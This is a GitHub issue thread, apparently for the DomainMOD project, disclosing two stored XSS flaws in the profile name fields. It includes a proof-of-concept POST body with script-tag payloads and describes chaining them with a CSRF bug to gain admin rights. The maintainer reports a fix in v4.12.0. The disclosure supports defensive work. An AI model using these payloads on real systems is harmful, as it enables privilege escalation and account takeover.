There are two Stored XSS vulnerability #66

anquanquantao · 2018-05-29T14:29:58Z

There are two Stored XSS vulnerability.
read-only user use the add the Stored XSS and CSRF can add administrator account or change the read-only user to admin or change admin password……

poc:
after read-only user login
post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0

then the admin login ,open the url https://demo.domainmod.org/admin/users/. the javascript will execution. with CSRF vulnerability(#65) , a read-only user can add administrator account or change the read-only user to admin or change admin password……

The text was updated successfully, but these errors were encountered:

chetcuti · 2019-02-03T23:40:03Z

This was fixed in v4.12.0, which was released earlier today.

Thanks for the report!

NicoleG25 · 2020-01-02T14:56:25Z

@chetcuti could you please point me to the fix/commit? :) thanks.

chetcuti self-assigned this Aug 31, 2018

chetcuti added the investigating label Aug 31, 2018

chetcuti closed this as completed Feb 3, 2019

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

There are two Stored XSS vulnerability #66

There are two Stored XSS vulnerability #66

anquanquantao commented May 29, 2018

chetcuti commented Feb 3, 2019

NicoleG25 commented Jan 2, 2020

There are two Stored XSS vulnerability #66

There are two Stored XSS vulnerability #66

Comments

anquanquantao commented May 29, 2018

chetcuti commented Feb 3, 2019

NicoleG25 commented Jan 2, 2020